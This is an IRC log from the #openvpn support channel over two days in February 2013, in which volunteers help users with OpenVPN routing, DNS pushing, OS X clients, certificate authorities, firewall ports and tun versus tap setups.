[~DrCode@gateway/tor-sasl/drcode] has quit [Ping timeout: 276 seconds] 13:04 -!- DrCode_ is now known as DrCode 13:14 -!- p3rror [~mezgani@41.140.231.29] has quit [Ping timeout: 245 seconds] 13:18 -!- sysdoc [~sysdoc@pool-71-105-40-229.lsanca.dsl-w.verizon.net] has joined #openvpn 13:25 -!- jtrucks [jtrucks@freenode/staff/lopsa.board.jtrucks] has quit [Remote host closed the connection] 13:25 -!- jtrucks [jtrucks@freenode/staff/lopsa.board.jtrucks] has joined #openvpn 13:30 -!- coreGrl [~a@host18-17-dynamic.4-87-r.retail.telecomitalia.it] has quit [Quit: Sto andando via] 13:33 -!- jtrucks [jtrucks@freenode/staff/lopsa.board.jtrucks] has quit [Read error: error:1408F119:SSL routines:SSL3_GET_RECORD:decryption failed or bad record mac] 13:34 -!- jtrucks [jtrucks@freenode/staff/lopsa.board.jtrucks] has joined #openvpn 13:34 -!- jtrucks_ [jtrucks@freenode/staff/lopsa.board.jtrucks] has joined #openvpn 13:34 -!- jtrucks [jtrucks@freenode/staff/lopsa.board.jtrucks] has quit [Quit: Lost terminal] 13:34 -!- jtrucks_ [jtrucks@freenode/staff/lopsa.board.jtrucks] has quit [Quit: Lost terminal] 13:35 -!- jtrucks [jtrucks@freenode/staff/lopsa.board.jtrucks] has joined #openvpn 13:40 -!- brute11k [~brute11k@89.249.235.210] has joined #openvpn 13:45 -!- brute11k [~brute11k@89.249.235.210] has quit [Ping timeout: 276 seconds] 13:46 -!- brute11k [~brute11k@89.249.235.210] has joined #openvpn 14:16 -!- brute11k [~brute11k@89.249.235.210] has quit [Quit: Leaving.] 14:17 -!- Devastator [~devas@unaffiliated/devastator] has quit [Ping timeout: 255 seconds] 14:17 -!- Devastator [~devas@186.214.15.79] has joined #openvpn 14:21 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: quit] 14:26 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Read error: Connection reset by peer] 14:27 -!- p3rror [~mezgani@41.248.171.225] has joined #openvpn 14:35 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Ping timeout: 276 seconds] 14:43 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 14:52 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 248 seconds] 14:53 -!- sofia25 [~sofia25@24.157.255.130] has joined #openvpn 14:53 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn 14:53 < sofia25> anyone guys...i would like to know your inputs about my openvpn setup ??? 14:59 < sofia25> anyone here? 15:00 -!- neilhwatson [~neilhwats@CPE00e081b5ee1e-CMbc140134c320.cpe.net.cable.rogers.com] has quit [Quit: leaving] 15:00 < sofia25> !welcome 15:00 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. || Also interesting: !man !/30 !topology !iporder !sample !forum 15:00 <@vpnHelper> !wiki !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict) 15:08 < sofia25> I would like to setup a central host (SERVER) that could have access to 5 clients networks (192.168.1.0/24 - Client A, 192.168.2.0/24 - Client B...) in a site-to-site architecture, SERVER can access Client A but Client B cannot access client A...is that possible? Or should i setup a client-server architecture? Which one is best suitable setup? 15:20 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Read error: Connection reset by peer] 15:22 < rob0> Client-server or p2p is not relevant. Each connection makes a tunnel between those two endpoints. 15:22 < rob0> what you probably need is a better understanding of IP routing 15:22 < rob0> !route 15:22 <@vpnHelper> "route" is (#1) http://www.secure-computing.net/wiki/index.php/OpenVPN/Routing or https://community.openvpn.net/openvpn/wiki/RoutedLans (same page mirrored) if you have lans behind openvpn, read it DONT SKIM IT or (#2) READ IT DONT SKIM IT! or (#3) See !tcpip for more info about a more basic networking guide or (#4) See !serverlan or !clientlan for steps and troubleshooting flowcharts for LANs behind 15:22 <@vpnHelper> the server or client 15:23 < sofia25> Basically, I needed each branch to be able to route to the home office network, and the home office network to be able to route to each of the branch office networks (but the branches did not need to route each other). 15:25 < sofia25> it's just that i see openvpn recipes about point-to-point (ex.: ifconfig SERVERIP CLIENTIP) and client-server setup (server 192.168.200.0 255.255.255.0) 15:27 -!- bjh4 [~bjh4@12.239.198.1] has quit [Quit: Leaving] 15:30 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has quit [Quit: Leaving] 15:40 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [] 15:46 -!- GabrieleV [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has quit [Ping timeout: 260 seconds] 16:04 -!- sqwerty [~sqwerty@unaffiliated/sqwerty] has joined #openvpn 16:15 -!- dazo is now known as dazo_afk 16:24 -!- Orbi [~opera@109.129.10.139] has joined #openvpn 16:27 -!- neilhwatson [~neilhwats@cl-274.chi-03.us.sixxs.net] has joined #openvpn 16:29 < neilhwatson> Is there a similar command to "redirect-gateway def1" that does not set the default gw, but ensures the tunnel routes through the client's default gw? The client's default gw on the client is dynamic, from the ISP. 16:29 -!- Orbi [~opera@109.129.10.139] has left #openvpn [] 16:35 -!- Teck7 [~teck7@bas1-montreal54-1168086246.dsl.bell.ca] has joined #openvpn 16:38 -!- rfxn [~teck7@70.50.155.78] has quit [Ping timeout: 252 seconds] 16:41 -!- Cybertinus [~Cybertinu@2001:828:405:30:83:96:177:42] has quit [Remote host closed the connection] 16:45 -!- Cybertinus [~Cybertinu@2001:828:405:30:83:96:177:42] has joined #openvpn 16:49 < rob0> Maybe you're asking about --route, but TBH I can't tell. 16:49 < rob0> are you wanting to redirect the gateway? 16:50 -!- anto [~chatzilla@14.140.176.210] has quit [Ping timeout: 248 seconds] 16:50 < neilhwatson> I do not want to redirect the gate way. I have a bridged setup. It worked when I was redirecting the gateway but fails when I remove "push "redirect-gateway def1". I can no longer ping the vpn server. 16:58 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn 16:58 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host] 16:58 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 16:58 -!- mode/#openvpn [+o krzee] by ChanServ 17:03 < neilhwatson> aha redirect-private 17:03 < sqwerty> is there a way to tell linux clients to use a specific dns server that is supported natively ? 17:04 -!- Drone4four [~gnull@CPE78cd8e66c1f0-CM78cd8e66c1ed.cpe.net.cable.rogers.com] has quit [Quit: Leaving] 17:05 -!- p3rror [~mezgani@41.248.171.225] has quit [Read error: Connection reset by peer] 17:07 < neilhwatson> Perhaps push dhcp-option DNS 17:08 -!- anto [~chatzilla@111.92.56.21] has joined #openvpn 17:08 < sqwerty> man pages says it just sets an envinronment variable on linux systems and doesn't actually do anything 17:08 < sqwerty> which seems to be the case 17:09 < rob0> sqwerty, my solution was to use dnsmasq on server and clients 17:11 -!- anto [~chatzilla@111.92.56.21] has quit [Remote host closed the connection] 17:12 < sqwerty> ah k. ideally was looking for a solution that could be kept within openvpn configuration, but will have a look cheers 17:20 < rob0> dnsmasq has other benefits as well. 17:20 < rob0> http://rob0.nodns4.us/dnsmasq.html 17:20 <@vpnHelper> Title: DNS in OpenVPN: a better approach (at rob0.nodns4.us) 17:23 <@krzee> [19:08] man pages says it just sets an envinronment variable on linux systems and doesn't actually do anything 17:23 <@krzee> !pushdns 17:23 <@vpnHelper> "pushdns" is (#1) push "dhcp-option DNS a.b.c.d" to push dns to the client or (#2) http://thread.gmane.org/gmane.network.openvpn.user/25139/focus=25147 see that mail archive for some info on pushing dns or (#3) http://article.gmane.org/gmane.network.openvpn.user/25149 for a perm fix via regedit or (#4) in unix you'll use the update-resolv-conf script or (#5) also 17:23 <@vpnHelper> http://comments.gmane.org/gmane.network.openvpn.user/31975 reports --register-dns as fixing their problems pushing DNS to windows 7 17:23 <@krzee> see #4 17:23 -!- Eagleman [~Eagleman@vpn.eagleman.net] has quit [Ping timeout: 256 seconds] 17:29 < sqwerty> perfect krzee :) 17:29 < sqwerty> what happens if i give that config to a windows client ? 17:29 < sqwerty> will it blow up when it can't find /etc/openvpn/update-resolv-conf ? 17:30 <@krzee> dont use that option on the windows client, its not needed 17:30 < sqwerty> ye i know. i'm just wondering if i can make a cross-platform config 17:31 * s7r is feeling sexy & free 17:32 <@krzee> no 17:32 <@krzee> :D 17:32 <@krzee> also, dont you want to drop permissions on linux? 17:32 <@krzee> (cant do that in windows) 17:36 < sqwerty> ye true. gonna have to see what happens if i put that in windows client config 17:36 < sqwerty> otherwise i'll give up on the idea :) 17:37 < sqwerty> any idea if update-resolv-conf works on osx ? 17:37 < sqwerty> sorry for the lame questions :P 17:41 < sqwerty> nm i clearly know f all about osx ;] 17:41 < pekster> Tunnelblick ships with its own set of OS X related scripts 17:41 < pekster> DNS is... "different" on macs 17:42 < pekster> They have resolv.conf, but dnsctl re-writes it whenever it feels like it 17:42 < pekster> So you need to use the Apple Way™ when doing DNS 17:45 < uberushaximus> what a special little snowflake 17:46 < pekster> Well, my poking at apple's special way of doing things aside, I've had the least problems with deployments on that platform than any other 17:46 < pekster> Linux tends to work fine, but you end up with distro issues if you support end-users on any "Unix-like" platform, and Windows is, well, Windows 17:53 < sqwerty> would you say osx... just works? 17:54 < pekster> If managed/deployed properly, yes 17:54 < pekster> Literally no setup beyond the user dragging my pre-packaged (ie: configuration and everything "inside" the deploy folder as per the Tunnelblick docs) .app file to the Application folder 17:55 -!- bjh4 [~bjh4@ool-4357696f.dyn.optonline.net] has joined #openvpn 17:55 < pekster> It all "just works" from there. Of course, magic goes into the process to set up the server and deployment package properly. You need an IT guy who knows what he/she is doing, but that's always the case ;) 17:56 < sqwerty> cool thanks for the advice. will have a look at tunnelblick 17:59 -!- s7r [~s7r@openvpn/user/s7r] has left #openvpn [] 18:03 -!- sh_t [~sht@176.222.238.158] has quit [Ping timeout: 260 seconds] 18:04 -!- sh_t [~sht@176.222.238.158] has joined #openvpn 18:04 <@krzee> haha !allyouneed = You need an IT guy who knows what he/she is doing. After that it's all easy! 18:04 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn 18:05 < pekster> Well, I didn't mean to imply that a custom setup literally works out of the box 18:05 < pekster> It did from our user's perspective, but that's becuase I did all the hard work weeks before ;) 18:05 -!- Denial- [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has joined #openvpn 18:06 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has quit [Ping timeout: 255 seconds] 18:06 -!- Denial- is now known as Denial 18:06 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 18:14 -!- raidz is now known as raidz_away 18:15 -!- JSharpe [~JSharpe@10-253-3-31-anc.floodtel.net] has quit [Quit: Leaving] 18:16 -!- raidz_away is now known as raidz 18:26 -!- neilhwatson [~neilhwats@cl-274.chi-03.us.sixxs.net] has quit [Quit: Leaving.] 18:37 -!- sysdoc [~sysdoc@pool-71-105-40-229.lsanca.dsl-w.verizon.net] has quit [Quit: Leaving] 18:40 -!- bluethundr [~dunphy@ool-4573b723.dyn.optonline.net] has quit [Remote host closed the connection] 18:50 -!- sofia_25 [~sofia25@24.157.255.130] has joined #openvpn 18:50 -!- sofia_25 [~sofia25@24.157.255.130] has quit [Client Quit] 18:52 -!- sofia25 [~sofia25@24.157.255.130] has quit [Ping timeout: 248 seconds] 19:10 -!- Devastator [~devas@186.214.15.79] has quit [Changing host] 19:10 -!- Devastator [~devas@unaffiliated/devastator] has joined #openvpn 19:11 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has quit [Ping timeout: 255 seconds] 19:13 -!- tswett [~quassel@unaffiliated/tswett] has joined #openvpn 19:13 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has joined #openvpn 19:13 -!- raidz is now known as raidz_away 19:14 < tswett> Ahoy. I'm trying to get an OpenVPN server running. I've generated a bunch of keys, and now I just ran build-dh a second time. 19:14 < tswett> Is that going to cause any problems? 19:20 <@krzee> you can build-dh as many times as you want 19:20 <@krzee> wont hurt anything 19:22 < tswett> *nod* Thanks. 19:22 <@krzee> np 19:36 < rob0> build-dh until you get it right! 19:36 < rob0> build-dh until the cows come home! 19:37 < rob0> build-dh until the sun comes up over Santa Monica Blvd! 19:53 <@krzee> hahah 20:01 -!- n0sq [~quassel@75-135-14-61.dhcp.krny.ne.charter.com] has joined #openvpn 20:13 -!- uberushaximus [~uberushax@hacked.thegov.us] has quit [Ping timeout: 252 seconds] 20:13 -!- uberushaximus [~uberushax@hacked.thegov.us] has joined #openvpn 20:15 -!- takamichi [~Takamichi@c101-159.i07-26.onvol.net] has quit [Remote host closed the connection] 20:18 -!- bjh4 [~bjh4@ool-4357696f.dyn.optonline.net] has quit [Remote host closed the connection] 20:34 -!- cosmicfires [~el-brujo@c-50-135-29-248.hsd1.wa.comcast.net] has joined #openvpn 20:36 < cosmicfires> Hi what's the best port of openvpn for OS-X and where can I find set up docs? 20:36 <@krzee> port? 20:36 <@krzee> !osx 20:36 <@vpnHelper> "osx" is (#1) Tunnelblick includes everything you need to run OpenVPN on OS X. https://code.google.com/p/tunnelblick/ or (#2) Viscosity is another OpenVPN client for OS X, but it is commercial. http://www.thesparklabs.com/viscosity/ 20:36 < cosmicfires> version then 20:37 < cosmicfires> how about the version in ports? 20:37 <@krzee> go for it 20:37 <@krzee> its all the same openvpn 20:37 < cosmicfires> I'm looking for docs on setting it up, it didn't make an openvpn/ directory when I installed it 20:38 <@krzee> make your own, anywhere you want 20:38 <@krzee> the macports version doesnt have a startup script, so you get to handle that on your own anyways 20:38 < cosmicfires> can I copy my config from linux and make new client certs? 20:38 < pekster> FWIW, Tunnelblick has fantastic documentation on anything from a basic setup to a corporate deployment solution 20:39 <@krzee> yes 20:39 < cosmicfires> thanks I'll check it out 20:39 < pekster> The config should be nearly (if not completely) identical between Linux to OS X 20:39 < cosmicfires> I need different client certs correct? 20:39 < pekster> Minor stuff might change, such as the path to files and a lack of resolv.conf scripts (Tunnelblick handles that itself) 20:39 <@krzee> yes 20:40 < cosmicfires> thanks 20:52 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Remote host closed the connection] 20:57 -!- ciupicri [~ciupicri@unaffiliated/ciupicri] has joined #openvpn 20:57 -!- ciupicri [~ciupicri@unaffiliated/ciupicri] has left #openvpn [] 20:58 -!- ciupicri [~ciupicri@unaffiliated/ciupicri] has joined #openvpn 20:59 < ciupicri> can I have global CA -> openvpn CA -> server & client certs and accept only stuff signed by the openvpn CA? 21:01 <@krzee> while the answer is yes, why do you feel the need to have the openvpn CA be intermediate of the global CA? 21:03 < ciupicri> krzee: so that I can delegate stuff and contain better certificates related to openvpn 21:03 < ciupicri> s/contain/separate/ 21:03 <@krzee> and why not just have a separate CA for openvpn? 21:05 < ciupicri> hmmm I can't find a reason right now. I've just started the SSL thing with openvpn today. It might be worth a shot to have only the CA for open vpn 21:06 <@krzee> is the global CA one you use for web and stuff? signed by some other company? 21:08 < ciupicri> no, it's just for my use. I haven't bought something from the big companies. 21:09 < ciupicri> as for the other part of the question, yes I was thinking of using the global CA for the web and email servers and so on... 21:17 < ciupicri> anyway, another question that I have is why in the server mode with TLS, I' 21:18 < ciupicri> I'm getting one pair of addresses on the client and another different pair on the server 21:19 < ciupicri> e.g. xxxx.5 & xxxx.6 on the client and xxxx.1 & xxxx.2 on the server 21:19 < rob0> !/30 21:19 <@vpnHelper> "/30" is (#1) Default behaviour assigns a /30 subnet(4 addresses) to each peer. See http://goo.gl/6vemm for background or (#2) you can avoid this behavior by reading !topology or (#3) by default, first client is .6, then .10 .14 .18 etc or (#4) use openvpn --show-valid-subnets to see the subnets you can use in net30 or (#5) tl;dr Windows sucks, use --topology subnet in your server.conf 21:21 < ciupicri> got it, thank you 21:21 < ciupicri> thank you too, krzee 21:22 -!- tswett [~quassel@unaffiliated/tswett] has left #openvpn ["http://quassel-irc.org - Chat comfortably. Anywhere."] 21:25 <@krzee> yw 21:41 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 248 seconds] 21:53 -!- Netsplit *.net <-> *.split quits: Devastator, WinstonSmith, odoacre, speed_racer8, cosmicfires, dropje 21:55 -!- Netsplit over, joins: cosmicfires, speed_racer8, Devastator, WinstonSmith, odoacre, dropje 21:58 -!- mnathani [~mnathani@198-84-231-11.cpe.teksavvy.com] has quit [Ping timeout: 248 seconds] 22:09 -!- mnathani [~mnathani@198-84-231-11.cpe.teksavvy.com] has joined #openvpn 22:51 -!- brute11k [~brute11k@89.249.235.252] has joined #openvpn 22:51 -!- n0sq [~quassel@75-135-14-61.dhcp.krny.ne.charter.com] has quit [Read error: Connection reset by peer] 23:31 -!- kantlivelong [~kantlivel@47.23.189.90] has quit [Ping timeout: 245 seconds] 23:32 -!- odoacre [~antonio@us.happylatte.com] has quit [Excess Flood] 23:32 -!- odoacre [~antonio@64.235.48.199] has joined #openvpn 23:37 -!- kantlivelong [~kantlivel@home.kantlivelong.com] has joined #openvpn 23:54 -!- ciupicri [~ciupicri@unaffiliated/ciupicri] has quit [Ping timeout: 246 seconds] --- Day changed Wed Feb 27 2013 00:34 -!- brute11k [~brute11k@89.249.235.252] has quit [Read error: Connection reset by peer] 01:06 -!- odoacre [~antonio@64.235.48.199] has quit [Ping timeout: 264 seconds] 01:06 -!- odoacre [~antonio@64.235.48.199] has joined #openvpn 01:14 -!- odoacre [~antonio@64.235.48.199] has quit [Ping timeout: 248 seconds] 01:15 -!- odoacre [~antonio@64.235.48.199] has joined #openvpn 01:21 -!- GabrieleV [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has joined #openvpn 01:28 -!- GabrieleV [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has quit [Ping timeout: 255 seconds] 01:49 -!- roue [~roue@96-42-92-237.dhcp.roch.mn.charter.com] has quit [Ping timeout: 255 seconds] 01:56 -!- roue [~roue@96-42-92-237.dhcp.roch.mn.charter.com] has joined #openvpn 02:32 -!- GabrieleV [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has joined #openvpn 02:59 -!- kobolduk [~kobolduk@office.prolocation.net] has joined #openvpn 03:16 -!- sqwerty [~sqwerty@unaffiliated/sqwerty] has quit [Ping timeout: 248 seconds] 03:23 -!- zz_AsadH is now known as AsadH 03:45 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has quit [] 03:54 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has joined #openvpn 04:00 -!- sunta [~cornholio@hector.raytion.com] has joined #openvpn 04:04 -!- dazo_afk is now known as dazo 04:04 -!- sqwerty [~sqwerty@unaffiliated/sqwerty] has joined #openvpn 04:23 -!- marksaitis [~marksaiti@81.101.81.114] has joined #openvpn 04:47 -!- RealRancor [~Rancor@mafiaforum.de] has joined #openvpn 04:52 -!- RealRancor [~Rancor@mafiaforum.de] has quit [Ping timeout: 276 seconds] 05:01 -!- ciupicri [~ciupicri@unaffiliated/ciupicri] has joined #openvpn 05:09 -!- JSharpe [~JSharpe@10-253-3-31-anc.floodtel.net] has joined #openvpn 05:12 < JackSparrow> hi again, from the client i can ping the server, but not an external IP 05:12 < JackSparrow> with: push "redirect-gateway def1" 05:13 < JackSparrow> in the server log: MULTI: bad source address from client [192.168.0.42], packet dropped 05:15 < JackSparrow> i found i can solve that with a client config dir, is it possible to do that dynamically ? 05:15 < JackSparrow> (or, is that a NAT problem ?) 05:30 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn 05:39 -!- ciupicri [~ciupicri@unaffiliated/ciupicri] has quit [Quit: Leaving.] 05:52 -!- greyeax [~grey@cpe-108-185-215-179.socal.res.rr.com] has joined #openvpn 05:52 < greyeax> how do i create user accounts to login to an openvpn server? 05:52 < greyeax> google doesn't seem to want to give me a straight answer 05:57 < Wintereise> Generate new certificates for that user if you're using public cert based auth. 05:58 < Wintereise> Uname/pw, ...this is script based, depends on your script. 06:28 -!- mndo [~mndo@bl17-94-90.dsl.telepac.pt] has joined #openvpn 06:45 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 252 seconds] 06:49 -!- sam1 [~sam@194.236.182.101] has quit [Quit: sam1] 06:49 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 07:04 -!- kobolduk [~kobolduk@office.prolocation.net] has quit [Quit: ["Textual IRC Client: www.textualapp.com"]] 07:06 < JackSparrow> i ran wireshark on my openvpn server, i see ICMP packets from 10.99.1.10 to the IP that my client pings 07:07 < JackSparrow> i think that the server doesn't sends back the packets from the ping'd IP 07:11 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 07:14 -!- Teck7 is now known as rfxn 07:14 -!- mndo [~mndo@bl17-94-90.dsl.telepac.pt] has quit [Remote host closed the connection] 07:26 < JackSparrow> oh, it works. 07:31 -!- greyeax [~grey@cpe-108-185-215-179.socal.res.rr.com] has quit [Ping timeout: 276 seconds] 07:33 -!- sunta [~cornholio@hector.raytion.com] has quit [Quit: Verlassend] 07:43 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has quit [Ping timeout: 245 seconds] 07:58 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Ping timeout: 252 seconds] 08:00 -!- odoacre [~antonio@64.235.48.199] has quit [Ping timeout: 240 seconds] 08:07 -!- p3rror [~mezgani@41.140.38.124] has joined #openvpn 08:14 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn 08:21 -!- fu_fu [~Adium@c-107-3-50-191.hsd1.vt.comcast.net] has joined #openvpn 08:21 -!- odoacre [~antonio@64.235.48.199] has joined #openvpn 08:22 < fu_fu> hello, anyone familiar with ports to open on Cisco ASA to allow OVPN passthru? 08:22 < fu_fu> is 1194 sufficient? 08:25 <@dazo> fu_fu: yes, openvpn only uses a single UDP or TCP port ... completely standard port setup 08:29 < fu_fu> can you send me the flowchart link for connection troubleshooting? 08:30 < fu_fu> i get a conneciton on the server side, but can not pass ping 08:33 < fu_fu> Wed Feb 27 06:32:37 2013 TLS Error: TLS key negotiation failed to occur within 60 seconds (check your network connectivity) 08:35 < fu_fu> server says bad source address also 08:38 < havoc> fu_fu: that error is almost *always* the client FW blocking 08:39 < havoc> if it's windows, just allow all for openvpn.exe 08:40 < fu_fu> ok i will try, but i think the client FW is set to "off" 08:40 < havoc> ok 08:40 < havoc> but I've never seen that error be from anything else 08:40 < havoc> not saying it can't be, just that *I've* never seen it be from anything else 08:43 < fu_fu> havoc, you mean the TLS err right? 08:43 < havoc> 08:33:09 Wed Feb 27 06:32:37 2013 TLS Error: TLS key negotiation failed to occur within 60 seconds (check your network connectivity) 08:43 < havoc> that 08:43 < fu_fu> it got past the TLS error thanks 08:43 < fu_fu> right on 08:43 < havoc> ah, ok 08:44 < fu_fu> even tho the crappy windows firewall is "off" 08:47 < fu_fu> sweet, you rock, looks like i just have to get my routing worked out now 08:47 < fu_fu> unless oyu know about the bas source address lines, they repeat and i have them muted, but nice to have it clean 08:57 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Read error: Connection reset by peer] 08:57 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn 09:01 -!- dazo is now known as dazo_afk 09:01 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has joined #openvpn 09:06 -!- marksaitis [~marksaiti@81.101.81.114] has quit [Read error: Connection reset by peer] 09:28 -!- mndo [~mndo@bl17-94-90.dsl.telepac.pt] has joined #openvpn 09:32 -!- Erawan_Ra [~Erawan@at.erawan.me] has quit [Quit: Needed some rest ...] 09:34 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Read error: Connection reset by peer] 09:44 -!- DaCheat_ [JMark@external.JmarkIT.com] has quit [Quit: leaving] 09:46 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn 09:46 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host] 09:46 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 09:46 -!- mode/#openvpn [+o krzee] by ChanServ 10:14 -!- Saviq [~Saviq@canonical/saviq] has quit [Quit: ZNC - http://znc.sourceforge.net] 10:14 -!- Saviq [~Saviq@sawicz.net] has joined #openvpn 10:16 < dpecka> hello 10:16 < dpecka> need to resolvo following: 10:17 -!- Orbi [~opera@109.129.8.111] has joined #openvpn 10:18 < dpecka> can I fsomehow configure server that it requires that the key passphrase is typed and not saved localy on client side in some plaintext file ? 10:19 <@krzee> no, and there would be no way to enforce it 10:23 -!- raidz_away is now known as raidz 10:23 < dpecka> thanks, fair 10:24 <@krzee> i dont like it either 10:33 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn 10:40 -!- zhvtar is now known as Zhvtar 10:48 -!- AsadH is now known as zz_AsadH 10:52 -!- odoacre [~antonio@64.235.48.199] has quit [Ping timeout: 276 seconds] 10:52 -!- Saviq [~Saviq@sawicz.net] has quit [Quit: ZNC - http://znc.sourceforge.net] 10:53 -!- Saviq [~Saviq@sawicz.net] has joined #openvpn 10:54 -!- odoacre [~antonio@64.235.48.199] has joined #openvpn 10:59 -!- knobo [~user@ti0125a380-1018.bb.online.no] has quit [Ping timeout: 260 seconds] 11:02 -!- knobo [~user@ti0125a380-1018.bb.online.no] has joined #openvpn 11:06 -!- Varazir [~mircwars@c-94-255-130-138.cust.bredband2.com] has quit [Quit: brb] 11:08 -!- [1]JPeterson [~JPeterson@s213-103-210-215.cust.tele2.se] has quit [Read error: Connection reset by peer] 11:10 -!- Saviq [~Saviq@sawicz.net] has quit [Quit: ZNC - http://znc.sourceforge.net] 11:11 -!- alex88 [~alex88@unaffiliated/alex88] has joined #openvpn 11:13 < alex88> hi guys, at work we've a tap based vpn, now I wanted to include the vpn for android connection but I needed tap, is possible to use both in the same network range? 11:15 -!- Saviq [~Saviq@sawicz.net] has joined #openvpn 11:26 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has joined #openvpn 11:28 -!- MeanderingCode [~Meanderin@71-213-181-244.albq.qwest.net] has joined #openvpn 11:41 -!- Varazir [~mircwars@c-94-255-130-47.cust.bredband2.com] has joined #openvpn 11:47 -!- sqwerty [~sqwerty@unaffiliated/sqwerty] has quit [Ping timeout: 276 seconds] 11:48 <@plaisthos> !tunortap 11:48 <@vpnHelper> "tunortap" is (#1) you ONLY want tap if you need to pass layer2 traffic over the vpn (traffic destined for a MAC address). If you are using IP traffic you want tun. Dont waste the extra overhead. or (#2) and if your reason for wanting tap is windows shares, see !wins or (#3) also remember that if someone gets access to any side of a tap vpn they can use layer2 attacks like arp poisoning against 11:48 <@vpnHelper> you over the vpn or (#4) lan gaming? use tap! or (#5) Normal Android/iOS devices (not rooted/jailbroken) support only tun. 11:48 <@plaisthos> android does not spport tap 11:48 <@plaisthos> nd mixing of tap /tun is no support 11:48 < alex88> plaisthos: I know, but I need tap for actual clients 11:48 < alex88> btw I've solved using another subnet 11:48 < alex88> and it worked fine 11:52 < rob0> same network range? Why? 11:52 < rob0> no, your tun VPN should be a separate range. 11:57 < alex88> rob0: the idea was just to have the same clients on the same network, but I've set on a different range and it works fine 11:58 < rob0> if they're all going through the same server, it IS the same network, no? The IP address is just a number. The question is, can it be routed? 11:59 < alex88> rob0: it is the same server but they have 2 different subnets 11:59 < alex88> btw routing works fine 12:00 < alex88> just needed to add push some routes 12:00 -!- marksaitis [~marksaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has joined #openvpn 12:00 -!- HH [~Userfgfgf@adsl-98-82-180-100.jax.bellsouth.net] has joined #openvpn 12:01 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 12:01 < HH> hi all, not sure if there are people here or not but I dled your vpn and your long instructions are jargon to me so no clue how to make the bloody thing work 12:02 < HH> keep getting fatal errors on key, can't open the vpn 12:03 < HH> it would be awesome if you could do a simple instructions not a bill gates hacker style code from hell type instructions 12:04 -!- erry is now known as ^erry 12:04 -!- HH [~Userfgfgf@adsl-98-82-180-100.jax.bellsouth.net] has quit [Client Quit] 12:05 < dan__t> morning. been using openvpn for a few years now to get to my lab at home. i don't know if this is better handled in OpenVPN or just by being smarter with how I segregate my home network, but is there a way I can limit VPN users to specific hosts inside of my VPN? 12:05 -!- ^erry is now known as erry 12:07 < EugeneKay> Sure. Hand out static IPs and firewall 12:07 < EugeneKay> Don't use the --client-to-client uption 12:07 < dan__t> yea, firewalls would do it heh 12:07 < EugeneKay> option 12:08 * EugeneKay can't type 12:09 < rob0> haha, if "bill gates" is his best example of "hacker", HH is not going to do well in Unix and networking. 12:11 < rob0> dan__t, in addition to what EugeneKay said, you'll probably want to use a --client-config-dir and --ccd-exclusive. 12:11 < dan__t> right, i can do that 12:11 < dan__t> i do use ccd 12:13 -!- MeanderingCode [~Meanderin@71-213-181-244.albq.qwest.net] has quit [Remote host closed the connection] 12:13 < dan__t> awesome thanks. 12:14 < dan__t> http://securityskittles.wordpress.com/2012/03/14/two-factor-authentication-for-openvpn-on-centos-using-google-authenticator/ 12:14 < dan__t> wow. 